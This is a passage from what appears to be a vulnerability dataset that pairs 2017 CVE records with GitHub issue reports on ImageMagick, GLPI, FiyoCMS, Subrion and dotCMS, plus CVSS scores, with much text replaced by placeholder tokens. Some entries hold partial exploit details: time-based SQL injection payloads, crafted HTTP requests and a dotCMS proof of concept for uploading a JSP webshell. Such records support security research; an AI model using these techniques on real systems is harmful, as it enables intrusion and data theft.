        "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify VST file, imagemagick will allocate memory to store data in function APITAG in coders ga.c (line NUMBERTAG PATHTAG if (image >storage_class == APITAG // line NUMBERTAG can be controlled { ... size_t one; // line NUMBERTAG one NUMBERTAG line NUMBERTAG image >colors=one APITAG colors,exception) == APITAG // line NUMBERTAG PATHTAG APITAG is diretly from VST file without checking in tga.c (line NUMBERTAG PATHTAG APITAG char) APITAG // can be controlled by modify VST file PATHTAG By review the founction code, APITAG max valid value is NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can be overflow to NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can be large as NUMBERTAG GB). Normally, this will not cause problem because image >storage_class is equal APITAG But image >storage_class is also can be controlled , it is assigned as follow PATHTAG if APITAG == APITAG || APITAG == APITAG || APITAG == APITAG || APITAG == APITAG // image_type can be controlled image APITAG PATHTAG image_type is diretly from VST file PATHTAG APITAG APITAG PATHTAG Memory allocation is earlly than the security checking PATHTAG APITAG >columns,image >rows,exception); // line NUMBERTAG PATHTAG So, modifying the image_type and bits_per_pixel can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11183",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2450",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2450",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-12T04:45:10Z",
        "description": "any file delete in FILETAG . CVETAG APITAG Vectors] to exploit vulnerability ,someone must login with a admin accounts, and request URLTAG the \"file\" can route to any file with ../ and it can delete any files on the server",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-11184",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2449",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2449",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-12T04:40:25Z",
        "description": "SQL injection in FILETAG . CVETAG APITAG Vectors] to exploit vulnerability ,someone must login with a admin accounts, and request URLTAG and the \"start\" has sql injection whit poc NUMBERTAG PROCEDURE analyse((select APITAG > if NUMBERTAG true) the response will get after NUMBERTAG s , if NUMBERTAG false) the response will get right now",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11188",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/509",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/509",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-08T12:27:43Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ''' APITAG '''",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11310",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/517",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/517",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-22T03:21:28Z",
        "description": "memory leak in read_user_chunk_callback in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG The read_user_chunk_callback function in png.c allows attackers to cause a denial of service (memory leak) via a small crafted png file. ERRORTAG testcase CODETAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11329",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2456",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2456",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-12T14:16:12Z",
        "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of vulnerability to your email. Please check.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11348",
        "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3654",
        "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3654",
        "Repo_new": "octopusdeploy/issues",
        "Issue_Created_At": "2017-07-11T02:42:59Z",
        "description": "Validate APITAG in uploaded packages. source: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2017-11352",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/502",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/502",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-05-31T08:24:16Z",
        "description": "rle.c: operand/opcode variables copy & paste confusion in latest commit. Talking about NUMBERTAG fdf9ea commit.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11353",
        "Issue_Url_old": "https://github.com/TheLocehiliosan/yadm/issues/74",
        "Issue_Url_new": "https://github.com/thelocehiliosan/yadm/issues/74",
        "Repo_new": "thelocehiliosan/yadm",
        "Issue_Created_At": "2017-07-14T16:26:00Z",
        "description": "Create private .ssh and .gnupg directories prior to merge (during clone). As referenced in Debian NUMBERTAG CVETAG , permissions on APITAG and APITAG directories are restricted _after_ an initial clone is complete. Git employs the user's umask to set permissions for any files/directories created. If APITAG or APITAG directories already exist with restricted permissions prior to cloning, the permissions will not be changed. Git only affects the permissions of directories that do not already exist. In practice this race condition does not pose a problem assuming the encryption feature is used for confidential data. For example, suppose a user wants to manage a APITAG and APITAG . Also suppose the APITAG is limited configuration data only, and the APITAG is their private key. If APITAG is included using the encryption function the following scenarios are possible: If APITAG already exists and is secured During the clone APITAG permissions are not changed (remain secure) If APITAG does not yet exist During the clone APITAG and APITAG will be created with the default umask (at this point no private data is exposed) After the clone permissions are restricted yadm decrypt is run (either by the user or via bootstrap) and the APITAG is put into the APITAG . APITAG 's permissions will already be restricted at this point Regardless, I plan to update clone operations. If there are files under locations APITAG or APITAG and those paths do not yet exist (an initial clone), I will create empty directories and secure them first. This should mitigate any concerns about a race condition. However, I don't think there is any effective problem as it stands today.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-11354",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/4",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/4",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-07-15T19:34:26Z",
        "description": "SQL Injection in tag add function. There is an sql injection in tag adding function, its location is in PATHTAG No filter has been used in the $_POST FILETAG ERRORTAG In the database insert function, there is no filter function either, just add a couple of \" beside the tag name. So when we update the tag name or add a tag name there is always the problem of sql injection. URL: PATHTAG DATA: APITAG We need a account to do this thing. Discover: Chaitin Technology",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11360",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/518",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/518",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-22T15:26:04Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ERRORTAG APITAG APITAG APITAG Because the loop count can be controlled, so it can cause APITAG spend a lot of time to process a crafted imagefile, even if the imagefile is very small. Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11366",
        "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1011",
        "Issue_Url_new": "https://github.com/codiad/codiad/issues/1011",
        "Repo_new": "codiad/codiad",
        "Issue_Created_At": "2017-07-25T06:41:00Z",
        "description": "Security issues, Remote Code Execution Vulnerability. Hacker can get APITAG server privileges by the vulnerability, I have send you an email about that, but did not receive a reply. more details , please contact my mailbox",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11367",
        "Issue_Url_old": "https://github.com/Ed-von-Schleck/shoco/issues/28",
        "Issue_Url_new": "https://github.com/ed-von-schleck/shoco/issues/28",
        "Repo_new": "ed-von-schleck/shoco",
        "Issue_Created_At": "2017-02-22T01:13:49Z",
        "description": "global buffer overflow in APITAG Compiled with AFL with APITAG like APITAG and then run like APITAG which produces this: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11412",
        "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/5",
        "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/5",
        "Repo_new": "fiyocms/fiyocms",
        "Issue_Created_At": "2017-07-17T05:49:21Z",
        "description": "Many sq linjection in fiyo cms NUMBERTAG In PATHTAG $_POST['id'] has no filters and $_POST['art_title'] just filter the double quote. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG HTTP NUMBERTAG Referer: URLTAG id=\" and sleep NUMBERTAG art_title NUMBERTAG In PATHTAG $_POST paraments has some meanless filter. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG Referer: URLTAG send=true&name NUMBERTAG or sleep NUMBERTAG or NUMBERTAG email= EMAILTAG APITAG NUMBERTAG In PATHTAG $_GET[cat], $_GET[user], $_GET[level], APITAG are all no filters at all. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG APITAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG APITAG has no filters and they will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In add category and edit category they are the similar problems. In add article and edit article there are so many paraments have been not filtered. The attack vector is so simple and too many attact vector could be use. So I will not write the detail NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG In edit comment component: $_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status], $_POST[id] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In enable comment and disable comment component: $_REQUEST['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. The attack vector is so simple and too many attact vector could be use. So I will not write the detail. Discoverer: Valo & Melody from Chaitin Tech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11444",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/479",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/479",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-07-02T03:06:57Z",
        "description": "Subrion cms NUMBERTAG sql injection in FILETAG . description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $GET is passed to APITAG with no checking APITAG APITAG in PATHTAG ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is retrive parameter from $GET: ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is call a user function: ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is to construct a key value array string from parameter: ERRORTAG At last, self::ITEM_SEARCH_METHOD is referenced to APITAG PATHTAG ), it has the code, it's purpose it to excute sql, and $stmt is can be controlled as it is construct from client side data $GET: ERRORTAG So there exist a sql injection vulnerability. POC: get database user via sql injection URLTAG IMAGE: sql1",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11445",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/480",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/480",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2017-07-02T03:34:12Z",
        "description": "Subrion cms NUMBERTAG sql injection in FILETAG . Subrion cms NUMBERTAG sql injection in FILETAG description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $POST is passed to APITAG with no checking ERRORTAG APITAG in PATHTAG ERRORTAG There is a checking APITAG it means that anonymous user will be blocked as \"return false\", but any registered user will continue. So APITAG will be passed to row, and it is from $_POST FILETAG sleep NUMBERTAG url: FILETAG postdata: action=delete APITAG APITAG username&file NUMBERTAG time echo: FILETAG Credit: APITAG of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11446",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/537",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/537",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-04T15:25:07Z",
        "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG in the while loop, only two condition can cause loop exit NUMBERTAG APITAG != EOF' is false this statement will never be false, because APITAG must be NUMBERTAG or NUMBERTAG never be NUMBERTAG EOF NUMBERTAG if NUMBERTAG ff) && (y NUMBERTAG is true this statement will never be true, because small crafted file will cause: a) APITAG to set NUMBERTAG and b) APITAG to set y NUMBERTAG So a crafted will cause endless loop. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11447",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/556",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/556",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-09T21:57:23Z",
        "description": "Comment about commit URLTAG Could you comment and give a statement about security about this commit ?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11466",
        "Issue_Url_old": "https://github.com/dotCMS/core/issues/12131",
        "Issue_Url_new": "https://github.com/dotcms/core/issues/12131",
        "Repo_new": "dotcms/core",
        "Issue_Created_At": "2017-07-18T01:34:17Z",
        "description": "APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability. ========================== Advisory: APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Security Lab Affected Version NUMBERTAG the latest version ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in APITAG program, APITAG is widely used in many companies. Vulnerable cgi: PATHTAG private void APITAG session, APITAG request, APITAG response) throws ERRORTAG { String APITAG = null; APITAG listener = null; try { String APITAG = \"\"; listener = new APITAG APITAG factory = new APITAG APITAG = APITAG Enumeration params = APITAG APITAG + APITAG APITAG APITAG upload = new APITAG List items = APITAG boolean ERRORTAG = false; APITAG = false; String APITAG = null; if APITAG { APITAG = APITAG User user = APITAG if APITAG || APITAG { throw new APITAG not upload File. Invalid User\"); } } else { throw new APITAG not upload File. Invalid User\"); } for APITAG i = APITAG APITAG { APITAG APITAG = APITAG if APITAG { if APITAG NUMBERTAG L) { APITAG = true; } if APITAG { APITAG = APITAG APITAG NUMBERTAG else { APITAG = APITAG } APITAG = APITAG File APITAG = new APITAG + APITAG + APITAG + APITAG + APITAG if APITAG { throw new ERRORTAG APITAG or Path\"); } if APITAG { APITAG } File dest = new APITAG + APITAG + APITAG if APITAG { APITAG } APITAG APITAG } } if APITAG { APITAG = \"\"; } if ERRORTAG { APITAG null); } else { APITAG APITAG not process uploaded file. Please see log for details.\"); } } catch ERRORTAG e) { APITAG APITAG + APITAG APITAG APITAG APITAG APITAG } } APITAG can be controlled through paramter APITAG the upload data is not filtered and the uploaded path can be user defined\uff0cso attacker with the administrator authority can upload evil jsp webshell file to control the whole web site or even the web server. ========================== POC && EXP NUMBERTAG Login as administrator NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Cookie: your own cookies Connection: close Content Length NUMBERTAG Content Disposition: form data; name=\"xxx\"; APITAG APITAG NUMBERTAG shell is : FILETAG Attension: In some other cases: APITAG , then shell will be in PATHTAG like this: FILETAG , APITAG is your userid, even if you do not know your userid, you can bruteforce the number behind ' APITAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2017-11474",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2475",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2475",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-18T06:22:47Z",
        "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of \"SQL injection in APITAG to your email. Please check.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-11475",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2476",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2476",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-18T07:40:16Z",
        "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of \"SQL injection in APITAG to your email. Please check.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11478",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/528",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/528",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T15:03:00Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG a crafted file will cause this loop endless. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11501",
        "Issue_Url_old": "https://github.com/NixOS/nixpkgs/issues/27506",
        "Issue_Url_new": "https://github.com/nixos/nixpkgs/issues/27506",
        "Repo_new": "nixos/nixpkgs",
        "Issue_Created_At": "2017-07-19T19:34:44Z",
        "description": "Enabling TLS in APITAG disables peer checknig. If someone enables TLS in APITAG our module turns off TLS peer checking. This must not be the default behavior, and should be changed ASAP. Not sure if we can apply this to stable or not. URLTAG or pinned for time: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2017-11505",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/526",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/526",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T14:52:00Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11522",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/586",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/586",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-18T18:31:46Z",
        "description": "Null Point reference in APITAG Crash Link : URLTAG Trigger Command : ./magick convert APITAG output.mng Crash Detail : ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11523",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/591",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/591",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-07-19T15:25:18Z",
        "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert cpu APITAG FILETAG Here is the critical code ERRORTAG If text image file only contains APITAG line, it will cause APITAG to infinite loop. testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11524",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/506",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/506",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-04T10:19:05Z",
        "description": "assertion failed in APITAG On version: APITAG NUMBERTAG a crafted file revealed an assertion failure in blob.c. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11525",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/519",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/519",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-23T11:55:45Z",
        "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify CIN file that contains User defined data, imagemagick will allocate memory to store the data in function APITAG in coders\\inc.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is my real memory usage: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11526",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/527",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/527",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T14:55:35Z",
        "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11527",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/523",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/523",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T08:40:41Z",
        "description": "memory exhaustion in APITAG in dpx.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DPX file that contains user header data, imagemagick will allocate memory to store the data in function APITAG in coders\\dpx.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11528",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/522",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/522",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T07:54:37Z",
        "description": "memory leak in APITAG in dib.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in dib.c allows attackers to cause a denial of service (memory leak) via a small crafted dib file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11529",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/525",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/525",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-06-24T14:17:50Z",
        "description": "memory leak in APITAG in mat.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in mat.c allows attackers to cause a denial of service (memory leak) via a small crafted mat file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-11530",
